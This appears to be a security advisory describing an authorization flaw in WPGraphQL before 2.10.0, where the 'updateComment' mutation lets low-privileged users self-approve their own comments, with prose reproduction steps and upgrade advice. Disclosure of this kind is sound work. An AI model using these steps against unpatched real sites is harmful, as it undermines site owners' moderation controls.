WPGraphQL Comment Moderation Bypass Vulnerability

A vulnerability in WPGraphQL prior to version 2.10.0 allows low-privileged authenticated users, including those with custom roles lacking capabilities, to manipulate the moderation status of their own comments. This authorization flaw in the 'updateComment' mutation enables users to self-approve comments without the necessary permissions, thereby circumventing established moderation processes. The issue arises because the authorization check is based on comment ownership rather than specific capabilities, allowing untrusted users to exploit the mutation and approve their content.

Impact

Exploiting this vulnerability bypasses comment moderation workflows, enabling low-privileged users to self-approve comments, which can disrupt content management processes.

Reproduction

The vulnerability can be reproduced by creating a WordPress user with no capabilities and assigning them a custom role. After logging in as this user, a comment can be added to a post. The 'updateComment' mutation can then be used to change the comment's status to 'APPROVE', despite the user lacking the required moderation permissions. This process can be automated with a script that interacts with the WordPress GraphQL API.

Remediation

Users are advised to update WPGraphQL to version 2.10.0 or later, where this vulnerability has been patched.